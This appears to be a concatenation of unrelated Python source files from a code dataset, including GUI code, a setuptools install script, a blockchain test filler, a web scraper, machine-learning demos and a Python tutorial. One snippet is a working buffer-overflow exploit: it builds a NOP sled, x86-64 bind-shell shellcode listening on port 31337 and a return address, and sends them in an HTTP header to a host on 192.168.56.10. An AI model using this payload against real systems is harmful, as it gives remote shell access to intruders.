printb = Button(f2, text="PRINT",command=print_output,font=("Arial", 30), bg = "light green", fg = "blue", borderwidth=3, relief="raised")
printb.place(x =450 , y =550 )
def exit_win():
if messagebox.askokcancel("Exit", "Do you want to exit?"):
root.destroy()
exitb = Button(root, text="EXIT",command=exit_win,font=("Arial", 30), bg = "red", fg = "blue", borderwidth=3, relief="raised")
exitb.place(x =700 , y =550 )
root.protocol("WM_DELETE_WINDOW", exit_win)
root.mainloop()
| StarcoderdataPython |
6539517 | # When pip installs anything from packages, py_modules, or ext_modules that
# includes a twistd plugin (which are installed to twisted/plugins/),
# setuptools/distribute writes a Package.egg-info/top_level.txt that includes
# "twisted". If you later uninstall Package with `pip uninstall Package`,
# pip <1.2 removes all of twisted/ instead of just Package's twistd plugins.
# See https://github.com/pypa/pip/issues/355 (now fixed)
#
# To work around this problem, we monkeypatch
# setuptools.command.egg_info.write_toplevel_names to not write the line
# "twisted". This fixes the behavior of `pip uninstall Package`. Note that
# even with this workaround, `pip uninstall Package` still correctly uninstalls
# Package's twistd plugins from twisted/plugins/, since pip also uses
# Package.egg-info/installed-files.txt to determine what to uninstall,
# and the paths to the plugin files are indeed listed in installed-files.txt.
from distutils import log
from setuptools import setup
from setuptools.command.install import install
class InstallTwistedPlugin(install, object):
def run(self):
super(InstallTwistedPlugin, self).run()
# Make Twisted regenerate the dropin.cache, if possible. This is necessary
# because in a site-wide install, dropin.cache cannot be rewritten by
# normal users.
log.info("Attempting to update Twisted plugin cache.")
try:
from twisted.plugin import IPlugin, getPlugins
list(getPlugins(IPlugin))
log.info("Twisted plugin cache updated successfully.")
except Exception, e:
log.warn("*** Failed to update Twisted plugin cache. ***")
log.warn(str(e))
try:
from setuptools.command import egg_info
egg_info.write_toplevel_names
except (ImportError, AttributeError):
pass
else:
def _top_level_package(name):
return name.split('.', 1)[0]
def _hacked_write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[_top_level_package(k)
for k in cmd.distribution.iter_distribution_names()
if _top_level_package(k) != "twisted"
]
)
cmd.write_file("top-level names", filename, '\n'.join(pkgs) + '\n')
egg_info.write_toplevel_names = _hacked_write_toplevel_names
# Now actually define the setup
import txsockjs
import os
setup(
author="<NAME>",
author_email="<EMAIL>",
name="txsockjs",
version=txsockjs.__version__,
description="Twisted SockJS wrapper",
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url="http://github.com/Fugiman/sockjs-twisted",
license='BSD License',
platforms=['OS Independent'],
packages=["txsockjs","txsockjs.protocols","twisted.plugins"],
install_requires=[
"Twisted",
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Twisted",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Internet",
],
cmdclass = {
'install': InstallTwistedPlugin,
},
)
| StarcoderdataPython |
1783350 | <reponame>jin10086/py-evm
from eth.tools.fixtures.helpers import (
get_test_name,
)
from eth.tools.fixtures.normalization import (
normalize_bytes,
normalize_call_creates,
normalize_environment,
normalize_execution,
normalize_int,
normalize_logs,
normalize_state,
)
from eth.tools._utils.hashing import hash_log_entries
from eth.tools._utils.mappings import deep_merge
def fill_vm_test(
filler,
*,
call_creates=None,
gas_price=None,
gas_remaining=0,
logs=None,
output=b""
):
test_name = get_test_name(filler)
test = filler[test_name]
environment = normalize_environment(test["env"])
pre_state = normalize_state(test["pre"])
execution = normalize_execution(test["exec"])
assert len(test["expect"]) == 1
expect = test["expect"][0]
assert "network" not in test
assert "indexes" not in test
result = normalize_state(expect["result"])
post_state = deep_merge(pre_state, result)
call_creates = normalize_call_creates(call_creates or [])
gas_remaining = normalize_int(gas_remaining)
output = normalize_bytes(output)
logs = normalize_logs(logs or [])
log_hash = hash_log_entries(logs)
return {
test_name: {
"env": environment,
"pre": pre_state,
"exec": execution,
"post": post_state,
"callcreates": call_creates,
"gas": gas_remaining,
"output": output,
"logs": log_hash,
}
}
| StarcoderdataPython |
6505596 | <reponame>unworld11/Basic-Attendance<gh_stars>1-10
#Attendance for Zoom
print("Attendance Register")
Headers = ['Roll No.','Name']
Column = []
students = int(input("Number of Students in class ::: "))
for i in range(students):
roll=int(input("Enter Roll No. : "))
name=input("Enter Name :: ")
l=[roll,name]
Column.append(l)
print(Column)
| StarcoderdataPython |
1809410 | <reponame>iver56/wikipendium.no<filename>wikipendium/wiki/context_processors.py<gh_stars>10-100
import wikipendium.settings as settings
def google_analytics_processor(request):
try:
return {'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY,
'GOOGLE_ANALYTICS_NAME': settings.GOOGLE_ANALYTICS_NAME}
except:
return {}
| StarcoderdataPython |
5176822 | <filename>yelp/errors.py
''' Custom exception module '''
# --- python module imports
from flask import jsonify
# --- local module imports
from yelp import app
class InvalidUsage(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
# initialize the base Exception class
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
rv['status_code'] = self.status_code
return rv
@app.errorhandler(InvalidUsage)
def handle_invalid_usage_error(error):
''' Global error handler on application error '''
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
| StarcoderdataPython |
11202091 | import sys
import reader
r = reader.Reader(sys.argv[1])
try:
print(r.read())
finally:
r.close() | StarcoderdataPython |
324991 | # -*- coding: utf8 -*-
#time:2017/9/19 11:34
#VERSION:1.0
#__OUTHOR__:guangguang
#Email:<EMAIL>
from numpy import *
# load data 导入数据
def loadDataSet(fileName):
numFeat = len(open(fileName).readline().split('\t')) - 1
dataMat = []; labelMat = []
fd = open(fileName)
for line in fd.readlines():
lineArr = []
curLine = line.strip().split('\t')
for i in range(numFeat):
lineArr.append(float(curLine[i]))
dataMat.append(lineArr)
labelMat.append(float(curLine[-1]))
return dataMat, labelMat
# linear regression 计算回归系数
def linearRegres(xVec, yVec):
xMat = mat(xVec);yMat = mat(yVec).T
xTx = xMat.T * xMat
if linalg.det(xTx) == 0: # 奇异矩阵不能求逆
print('This matrix is singular, cannot do inverse')
return
theta = xTx.I * xMat.T * yMat
return theta
#DEBUG
if __name__ == "__main__":
pass | StarcoderdataPython |
346313 | import sys
def main():
if len(sys.argv) < 2:
sys.exit("Too few arguments, please provide a valid semantic version")
version = sys.argv[1]
semver_file = open("semver", "r", newline="\n")
semver = semver_file.read()
semver_file.close()
if semver != version:
sys.exit("Given semantic version " + version + " is not matching generated version " + semver)
else:
print("Validation successful. Semantic version: " + version)
main()
| StarcoderdataPython |
4870645 | # -*- coding: utf-8 -*-
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2008, <NAME> <<EMAIL>>
# Copyright 2014, <NAME> <<EMAIL>>
from coherence.upnp.devices.basics import DeviceHttpRoot, BasicDevice
from coherence.upnp.services.servers.switch_power_server import SwitchPowerServer
from coherence.upnp.services.servers.dimming_server import DimmingServer
class HttpRoot(DeviceHttpRoot):
logCategory = 'dimmablelight'
class DimmableLight(BasicDevice):
logCategory = 'dimmablelight'
device_type = 'DimmableLight'
version = 1
model_description = 'Coherence UPnP %s' % device_type
model_name = 'Coherence UPnP %s' % device_type
_service_definition = (
('switch_power_server', SwitchPowerServer),
('dimming_server', DimmingServer),
)
_httpRoot = HttpRoot
| StarcoderdataPython |
1635652 | from __future__ import absolute_import
from __future__ import print_function
import os
from shutil import copyfile
from testing_simulation import Simulation
from generator import TrafficGenerator
from model import TestModel
from visualization import Visualization
from utils import import_test_configuration, set_sumo, set_test_path
if __name__ == "__main__":
config = import_test_configuration(config_file='testing_settings.ini')
sumo_cmd = set_sumo(config['gui'], config['sumocfg_file_name'], config['max_steps'])
model_path, plot_path = set_test_path(config['models_path_name'], config['model_to_test'])
Model = TestModel(
input_dim=config['num_states'],
model_path=model_path
)
TrafficGen = TrafficGenerator(
config['max_steps'],
config['n_v_generated']
)
Visualization = Visualization(
plot_path,
dpi=96
)
Simulation = Simulation(
Model,
TrafficGen,
sumo_cmd,
config['max_steps'],
config['green_duration'],
config['yellow_duration'],
config['num_states'],
config['num_actions']
)
print('\n----- Test episode')
simulation_time = Simulation.run(config['episode_seed']) # run the simulation
print('Simulation time:', simulation_time, 's')
print("----- Testing info saved at:", plot_path)
copyfile(src='testing_settings.ini', dst=os.path.join(plot_path, 'testing_settings.ini'))
Visualization.save_data_and_plot(data=Simulation.reward_episode, filename='reward', xlabel='Action step', ylabel='Reward')
Visualization.save_data_and_plot(data=Simulation.queue_length_episode, filename='queue', xlabel='Step', ylabel='Queue lenght (vehicles & pedestrians)')
| StarcoderdataPython |
5138293 | <filename>installer/steps/b_pip.py
from helper import *
section("Install requirements")
shell("pip install -U -r installer/requirements.txt", True).should_not_fail()
| StarcoderdataPython |
3591415 | <reponame>Facco98/OffTech
#!/usr/bin/python
import requests
host='192.168.56.10'
port=8081
# Our return address ( shifted from beginning of buffer )
ret_address = b'\x50\xca\x5d\xf7\xff\x7f'
ret_addr_length = 6;
inital_nop_slide_length = 500
# Our shellcode to bind a shell on port 31337
shellcode=b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
shellcode_length = 150
# With 1136 bytes we overwrite the the whole return address
# We cannot do this: cannot insert \x00 in the string
total_bytes = 1136 - (8 - ret_addr_length)
# Creating the initial NOP slide
initial_nop_sled=b'\x90' * inital_nop_slide_length
# Creating the padding NOP slide
padding_nop_sled=b'\x90' * ( total_bytes - ret_addr_length - inital_nop_slide_length -shellcode_length )
# Combining everything together
exploit_string = initial_nop_sled+shellcode+padding_nop_sled+ret_address
print('About to exploit, connect to ' + host + ' on port 31337')
# Launching the POST request with malicious header
requests.post('http://' + host + ':' + str(port), headers={'Content-Length': exploit_string})
| StarcoderdataPython |
3277214 | import numpy as np
from multiagent.core import World, Landmark
from multiagent.scenario import BaseScenario
from particle_environments.mager.world import MortalAgent, HazardousWorld
from particle_environments.mager.observation import format_observation
from particle_environments.common import is_collision, distance, delta_pos
from particle_environments.common import DefaultParameters as DP
class Obstacle(Landmark):
def __init__(self):
super().__init__()
self.known = False
class ObstacleWorld(World):
def __init__(self):
super().__init__()
self.obstacles = []
@property
def entities(self):
return self.agents + self.landmarks + self.obstacles
class Scenario(BaseScenario):
num_agents = 10
num_landmarks = 3
num_obstacles = 1
def make_world(self):
world = HazardousWorld()
# observation-based communication
world.dim_c = 0
world.max_communication_distance = DP.max_communication_distance
# add landmarks
world.landmarks = [Landmark() for i in range(self.num_landmarks)]
for i, landmark in enumerate(world.landmarks):
landmark.name = 'landmark %d' % i
landmark.collide = True
landmark.movable = False
landmark.size = DP.landmark_size
# add obstacles
world.obstacles = [Obstacle() for i in range(self.num_obstacles)]
for i, obstacle in enumerate(world.obstacles):
obstacle.name = 'obstacle %d' % i
obstacle.collide = True
obstacle.size = 0.05
# make initial conditions
self.reset_world(world)
return world
def reset_world(self, world):
# add agents with random properties
world.agents = [MortalAgent() for i in range(self.num_agents)]
for i, agent in enumerate(world.agents):
agent.name = 'agent %d' % i
agent.terminated = False
agent.collide = True
agent.silent = True
agent.size = DP.agent_size
agent.color = np.array([0.35, 0.35, 0.85])
# random properties for landmarks
for i, landmark in enumerate(world.landmarks):
landmark.color = np.array([0.25, 0.25, 0.25])
goal = np.random.choice(world.landmarks)
goal.color = np.array([0.15, 0.65, 0.15])
for i, obstacle in enumerate(world.obstacles):
obstacle.color = np.array([0.90, 0.40, 0.40])
# set random initial states
for agent in world.agents:
agent.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
agent.state.p_vel = np.zeros(world.dim_p)
agent.state.c = np.zeros(world.dim_c)
for landmark in world.landmarks:
landmark.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
landmark.state.p_vel = np.zeros(world.dim_p)
for obstacle in world.obstacles:
obstacle.state.p_pos = np.random.uniform(-1, +1, world.dim_p)
obstacle.state.p_vel = np.zeros(world.dim_p)
def benchmark_data(self, agent, world):
rew = 0
collisions = 0
occupied_landmarks = 0
min_dists = 0
for l in world.landmarks:
dists = [np.linalg.norm(a.state.p_pos - l.state.p_pos) for a in world.agents]
min_dists += min(dists)
rew -= min(dists)
if min(dists) < 0.1:
occupied_landmarks += 1
if agent.collide:
for a in world.agents:
if is_collision(a, agent):
rew -= 1
collisions += 1
return (rew, collisions, min_dists, occupied_landmarks)
def reward(self, agent, world):
# Agents are rewarded based on minimum agent distance to each landmark, penalized for collisions
rew = 0
for l in world.landmarks:
dists = [np.linalg.norm(a.state.p_pos - l.state.p_pos) for a in world.agents]
rew -= min(dists)
for o in world.obstacles:
if o.known:
dists = [np.linalg.norm(a.state.p_pos - o.state.p_pos) for a in world.agents]
rew += min(dists)
if agent.collide:
for a in world.agents:
if is_collision(a, agent):
rew -= 1
return rew
def observation(self, agent, world):
def communications_observed(other_agent):
''' fill in information communicated between agents
'''
comms = delta_pos(other_agent, agent).tolist()
comms += [other_agent.state.c]
# will only work with zero-padding formatting
# TODO: I think non-communication should send None instead of zero, because zero has real meaning
# however this causes a problem with action function
if distance(agent, other_agent) > world.max_communication_distance:
comms = [0] * len(comms)
return comms
landmark_positions = format_observation(observe = lambda landmark: delta_pos(landmark, agent).tolist(),
objects = world.landmarks,
num_observations = len(world.landmarks),
observation_size = world.dim_p)
communications = format_observation(observe = communications_observed,
objects = [a for a in world.agents if (a is not agent and not a.terminated)],
num_observations = self.num_agents,
observation_size = world.dim_p + 1,
sort_key = lambda o: distance(agent, o))
return np.asarray(agent.state.p_pos.tolist() + landmark_positions + communications)
| StarcoderdataPython |
6559869 | import requests
import json
with open("../config.json") as fp:
file = json.load(fp)
APIKEY = file["ApiKey"]
CITY = file["city"]
LOCATION = file["country"]
UNIT = "metric"
BASEURL = f"http://api.openweathermap.org/data/2.5/weather?q={CITY},{LOCATION}&APPID={APIKEY}&units={UNIT}"
result = requests.get(BASEURL).json()
def get_temp():
return result["main"]["temp"]
def get_desc():
return result["weather"][0]["main"]
def get_icon():
icon = result["weather"][0]["icon"]
icons = {
"01d": "static/img/clear_sky.png",
"01n": "static/img/clear_sky.png",
"02d": "static/img/few_clouds.png",
"02n": "static/img/few_clounds.png",
"03d": "static/img/clouds.png",
"03n": "static/img/clouds.png",
"04d": "static/img/broken_clouds.png",
"04n": "static/img/broken_clouds.png",
"09d": "static/img/shower_rain.png",
"09n": "static/img/shower_rain.png",
"10d": "static/img/rain.png",
"10n": "static/img/rain.png",
"11d": "static/img/thunderstorm.png",
"11n": "static/img/thunderstorm.png",
"13d": "static/img/snow.png",
"13n": "static/img/snow.png",
"50d": "static/img/fog.png",
"50n": "static/img/fog.png"
}
return icons[icon] | StarcoderdataPython |
368713 | <filename>app/core/middleware.py
from django.utils.deprecation import MiddlewareMixin
from django.http import HttpResponse
class AdminPermissionCheckMiddleware(MiddlewareMixin):
SSO_UNAUTHORISED_ACCESS_MESSAGE = (
'This application now uses internal Single Sign On. Please speak '
'to the GREAT Team so that we can enable your account.'
)
def process_view(self, request, view_func, view_args, view_kwarg):
if request.user is not None:
if request.resolver_match.namespace == 'admin' or \
request.path_info.startswith('/selling-online-overseas/admin/login'):
if not request.user.is_staff and request.user.is_authenticated:
return HttpResponse(self.SSO_UNAUTHORISED_ACCESS_MESSAGE, status=401)
| StarcoderdataPython |
4881542 | <gh_stars>0
""" main module """
from concurrent.futures import ThreadPoolExecutor
from datetime import date
from requests import request
import time
import threading
from rates_demo.business_days import business_days
def get_rates() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
for business_day in business_days(start_date, end_date):
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
rate_responses.append(response.text)
# for rate_response in rate_responses:
# print(rate_response)
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
def get_rate_task(business_day: date, responses: list[str]) -> None:
""" get rate task function """
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
responses.append(response.text)
def get_rates_threaded() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
threads: list[threading.Thread] = []
for business_day in business_days(start_date, end_date):
a_thread = threading.Thread(
target=get_rate_task, args=(business_day,rate_responses))
a_thread.start()
threads.append(a_thread)
for a_thread in threads:
a_thread.join()
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
# threadpool version
# def get_rates_threaded() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# rate_responses = list(executor.map(
# get_rate_task,
# [ business_day for business_day
# in business_days(start_date, end_date) ]))
# print(f"num of responses: {len(rate_responses)}")
# print(rate_responses)
# def get_rates_threaded_gen() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# executor.map(
# lambda params: get_rate_task(*params),
# ( (business_day, rate_responses) for business_day
# in business_days(start_date, end_date) ))
# print(f"num of responses: {len(rate_responses)}")
# if __name__ == "__main__":
# start = time.time()
# get_rates()
# print(f"original time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded()
# print(f"threaded time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded_gen()
# print(f"threaded time elapsed: {time.time() - start}")
| StarcoderdataPython |
3585952 | <filename>scrapper.py<gh_stars>0
"""
Scrapper implementation
"""
from datetime import datetime
import json
import shutil
from bs4 import BeautifulSoup
import requests
from constants import ASSETS_PATH, CRAWLER_CONFIG_PATH
from core_utils.article import Article
class IncorrectURLError(Exception):
"""
Seed URL does not match standard pattern
"""
class NumberOfArticlesOutOfRangeError(Exception):
"""
Total number of articles to parse is too big
"""
class IncorrectNumberOfArticlesError(Exception):
"""
Total number of articles to parse in not integer
"""
class Crawler:
"""
Crawler implementation
"""
def __init__(self, seed_urls, max_articles: int):
self.seed_urls = seed_urls
self.max_articles = max_articles
self.urls = []
def _extract_url(self, article_bs):
self.urls.append('https://magadanpravda.ru/' + article_bs.find('a')['href'])
def find_articles(self):
"""
Finds articles
"""
for urls in self.seed_urls:
response = requests.get(urls)
response.encoding = 'utf-8'
page_bs = BeautifulSoup(response.text, features='html.parser')
class_bs = page_bs.find_all('h3', class_='el-title uk-h4 uk-margin-top uk-margin-remove-bottom')
for article_bs in class_bs:
if len(self.urls) < self.max_articles:
self._extract_url(article_bs)
def get_search_urls(self):
"""
Returns seed_urls param
"""
return self.seed_urls
class HTMLParser:
def __init__(self, article_url, article_id):
self.article_url = article_url
self.article_id = article_id
self.article = Article(article_url, article_id)
def _fill_article_with_text(self, article_bs):
text_bs = article_bs.find('div', class_='el-content uk-panel uk-margin-top')
self.article.text = text_bs.text
def _fill_article_with_meta_information(self, article_bs):
title_bs = article_bs.find('h2', class_='el-title uk-font-tertiary uk-margin-top uk-margin-remove-bottom').text
self.article.title = title_bs
date_bs = article_bs.find('div', class_='el-meta uk-text-meta uk-margin-top').text
months = {
'января':'01',
'февраля':'02',
'марта':'03',
'апреля':'04',
'мая':'05',
'июня':'06',
'июля':'07',
'августа':'08',
'сентября':'09',
'октября':'10',
'ноября':'11',
'декабря':'12'
}
for key, value in months.items():
date_bs = date_bs.replace(key, value)
date = datetime.strptime(date_bs, "%d %m %Y | %H:%M")
self.article.date = date
topic = article_bs.find_all('span', class_='uk-text-middle')
for hashtags in topic:
self.article.topics.append(hashtags.text)
self.article.author = 'NOT FOUND'
def parse(self):
response = requests.get(self.article_url)
article_bs = BeautifulSoup(response.text, 'html.parser')
self._fill_article_with_text(article_bs)
self._fill_article_with_meta_information(article_bs)
return self.article
def prepare_environment(base_path):
"""
Creates ASSETS_PATH folder if not created and removes existing folder
"""
try:
shutil.rmtree(base_path)
except FileNotFoundError:
pass
base_path.mkdir(parents=True)
def validate_config(crawler_path):
"""
Validates given config
"""
with open(crawler_path, 'r', encoding='utf-8') as file:
config = json.load(file)
seed_urls = config['seed_urls']
max_articles = config['total_articles_to_find_and_parse']
if not isinstance(max_articles, int):
raise IncorrectNumberOfArticlesError
if max_articles <= 0:
raise IncorrectNumberOfArticlesError
if not isinstance(seed_urls, list):
raise IncorrectURLError
if not seed_urls:
raise IncorrectURLError
if max_articles > 200:
raise NumberOfArticlesOutOfRangeError
for urls in seed_urls:
if urls[0:8] != 'https://' and urls[0:7] != 'http://':
raise IncorrectURLError
return seed_urls, max_articles
if __name__ == '__main__':
sites, articles = validate_config(CRAWLER_CONFIG_PATH)
prepare_environment(ASSETS_PATH)
crawler = Crawler(sites, articles)
crawler.find_articles()
A_ID = 1
for article_url_new in crawler.urls:
parsing_article = HTMLParser(article_url_new, A_ID)
parsed_article = parsing_article.parse()
parsed_article.save_raw()
A_ID += 1
| StarcoderdataPython |
8059745 | <reponame>pranavj1001/MachineLearningRecipes<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 25 23:50:01 2017
@author: pranavjain
This model classifies the flower species using Naive Bayes.
Required Data to predict SepalLength in cm, SepalWidth in cm, PetalLength in cm, PetalWidth in cm.
"""
# import libraries
import numpy as np
import pandas as pd
# get data from the dataset
dataset = pd.read_csv('Iris.csv')
X = dataset.iloc[:, [1,2,3,4]].values
y = dataset.iloc[:, 5].values
# do this for labelEncoding since it is deprecated to directly use 1d arrays
y.reshape(-1,1)
# Label Encode the y set
# Iris-setosa -> 0
# Iris-versicolor -> 1
# Iris-virginica -> 2
from sklearn.preprocessing import LabelEncoder
labelEncoder_y = LabelEncoder()
y = labelEncoder_y.fit_transform(y)
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting Naive Bayes to the Training set
from sklearn.naive_bayes import GaussianNB
classifier = GaussianNB()
classifier.fit(X_train, y_train)
# predict our test results
y_pred = classifier.predict(X_test)
# to calculate the number of results that we got wrong
# eg. here we predicted all correct
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# predict for custom values
# Arguments(SepalLength in cm, SepalWidth in cm, PetalLength in cm, PetalWidth in cm)
test = np.matrix('4 1 5 1')
test =sc.transform(test)
pred = classifier.predict(test)
| StarcoderdataPython |
172121 | # Chapter 4
# 60 sec/min * 60 min/hr * 24 hr/day
# seconds_per_day = 86400
seconds_per_day = 86400 # 60 sec/min * 60 min/hr * 24 hr/day
# Continue Lines with \
alphabet = 'abcdefg' + \
'hijklmnop' + \
'qrstuv' + \
'wxyz'
print(alphabet)
# Compare with if, elif, and else
disaster = True
if disaster:
print("Woe!")
else:
print("Whee!")
# Some examples about comparison
# make multiple comparisons and, or, not
x = 7
r = (5 < x) and (x < 10)
print(r)
r = (5 < x) and not (x > 10)
print(r)
# multiple comparisons with one variable
r = 5 < x < 10
print(r)
# longer comparisons
r = 5 < x < 10 < 5
print(r)
# Python use another ways to check for empty data structures
# No only use boolean values
# Considered an value "False"
# (null | None)
# (int | 0)
# (float | 0.0)
# (empty string | "")
# (empty list | [])
# (empty tuple | ())
# (empty dict | {})
# (empty set | set())
some_list = []
if some_list:
print("There's something in here")
else:
print("Hey, it's empty!")
# Do Multiple Comparisons with in
letter = 'o'
if letter == 'a' or letter == 'e' or letter == 'i' or letter == 'o' or letter == 'u':
print(letter, 'is a vowel')
else:
print(letter, 'is not a vowel')
# Check values using "in"
# string
vowels = "aeiou"
letter = 'o'
print(letter in vowels)
# Set
vowel_set = {'a', 'e', 'i', 'o', 'u'}
print(letter in vowel_set)
# list
vowel_list = ['a', 'e', 'i', 'o', 'u']
print(letter in vowel_set)
# tuple
vowel_tuple = ('a', 'e', 'i', 'o', 'u')
print(letter in vowel_tuple)
# dict
vowel_dict = {'a': 'apple', 'e': 'elephant','i': 'impala', 'o': 'ocelot', 'u': 'unicorn'}
print(letter in vowel_dict)
# Repeat with while
count = 1
while count <= 5:
print(count)
count += 1
# loop infinite with break statement
while True:
stuff = input("String to capitalize [type q to quit]: ")
if stuff == 'q':
break
print(stuff.capitalize())
# Skip Ahead with continue
while True:
value = input("Integer, [please type q to quit]: ")
if value == 'q':
break
number = int(value)
if number % 2 == 0:
continue
print(number, "squared is", number*number)
# Use break with else
numbers = [1, 5, 3]
position = 0
while position < len(numbers):
number = numbers[position]
if number % 2 == 0:
print("Found even number: ", number)
break
position += 1
else: # break not called
print('No even number found')
# For
rabbits = ['Flopsy', 'Mopsy', 'Cottontail', 'Peter']
current = 0
while current < len(rabbits):
print(rabbits[current])
current += 1
# Better
for rabbit in rabbits:
print(rabbit)
# dict
accusation = {'room': 'ballroom', 'weapon': 'lead pipe', 'person': '<NAME>'}
for card in accusation: # or, for card in accusation.keys():
print(card)
# Values
for value in accusation.values(): # or, for card in accusation.keys():
print(value)
# Item
for item in accusation.items(): # or, for card in accusation.keys():
print(item)
# zip() to pair tuples
english = 'Monday', 'Tuesday', 'Wednesday'
french = 'Lundi', 'Mardi', 'Mercredi'
lst = list(zip(english, french))
print(lst)
zip_dict = dict(zip(english, french))
print(zip_dict)
# Zip
days = ['Monday', 'Tuesday', 'Wednesday']
fruits = ['banana', 'orange', 'peach']
drinks = ['coffee', 'tea', 'beer']
desserts = ['tiramisu', 'ice cream', 'pie', 'pudding']
binary = ["True", "False", "Other"]
integer = [1, 0]
print(tuple(zip(integer, binary)))
new_dict = dict(zip(integer, binary))
print(new_dict[1])
for day, fruit, drink, dessert in zip(days, fruits, drinks, desserts):
print(day, ": drink", drink, "- eat", fruit, "- enjoy", dessert)
# Generate Number Sequences with range()
for item in range(0, 3):
print(item)
print(list(range(0, 3)))
# make a range from 2 down to 0
for item in range(2, -1, -1):
print(item)
# Comprehensions
# List Comprehensions
# create a list without using comprehension
number_list = list(range(1, 6))
print(number_list)
# create a list using comprehension
number_list = [number for number in range(1, 6) if number % 2 == 1]
print(number_list)
# Using comprehension to create cells
rows = range(1, 4)
cols = range(1, 3)
cells = [(row, col) for row in rows for col in cols]
for cell in cells:
print(cell)
# Dictionary Comprehensions
word = 'letters'
letters_count = {letter: word.count(letter) for letter in word}
print(letters_count)
# Now using set()
letters_count = {letter: word.count(letter) for letter in set(word)}
print(letters_count)
# Set Comprehensions
a_set = {number for number in range(1, 6) if number % 3 == 1}
print(a_set)
# Generator
number_thing = (number for number in range(1, 6))
print(type(number_thing))
number_list = list(number_thing)
print(number_list)
try_again = list(number_thing)
print(try_again)
# Functions
def agree():
return True
if agree():
print('Splendid!')
else:
print('That was unexpected.')
# Parameters
def echo(anything):
return print(anything + ' ' + anything)
echo('LAM')
# With parameters and arguments
def commentary(color):
if color == 'red':
return "It's a tomato."
elif color == "green":
return "It's a green pepper."
elif color == 'bee purple':
return "I don't know what it is, but only bees can see it."
else:
return "I've never heard of the color " + color + "."
comment = commentary('blue')
print(comment)
# None value on functions
def do_something():
pass
print(do_something())
thing = None
if thing:
print("It's some thing")
else:
print("It's no thing")
# distinguish None from boolean False
if thing is None:
print("It's some thing")
else:
print("It's no thing")
def is_none(thing):
if thing is None:
print("It's None")
elif thing:
print("It's True")
else:
print("It's False")
is_none(None)
is_none(True)
is_none(False)
is_none(0)
is_none(0.0)
is_none(())
is_none([])
is_none({})
is_none(set())
def menu(wine, entree, dessert):
return {'wine': wine, 'entree': entree, 'dessert': dessert}
print(menu('chardonnay', 'chicken', 'cake'))
# Using
print(menu(entree='beef', dessert='bagel', wine='bordeaux'))
# Specify Default Parameter Values
def menu(wine, entree, dessert='pudding'):
return {'wine': wine, 'entree': entree, 'dessert': dessert}
print(menu('chardonnay', 'chicken'))
# Important, Default argument values are calculated when the function is
# defined, not when it is run
def buggy(arg, result=[]):
result.append(arg)
print(result)
# In above function: there’s a bug: it’s empty only the first time it’s called. The second time, result
# still has one item from the previous call:
print(buggy('a'))
print(buggy('b'))
# fixing last bug
def works(arg):
result = list()
result.append(arg)
return result
print(works('a'))
print(works('b'))
def non_buggy(arg, result=None):
if result is None:
result = []
result.append(arg)
print(result)
print(non_buggy('a'))
# Wow
def print_args(*args):
print('Positional argument tuple:', args)
print(print_args()) # Nothing return
print(print_args(3, 2, 1, 'wait!', 'uh...'))
# If your function has required positional arguments as well, *args goes at
# the end and grabs all the res
# Gather Positional Arguments with *
def print_more(required1, required2, *args):
print('Need this one:', required1)
print('Need this one too:', required2)
print('All the rest:', args)
print_more('cap', 'gloves', 'scarf', 'monocle', 'mustache wax')
# Gather Positional Arguments with *
def print_kwargs(**kwargs):
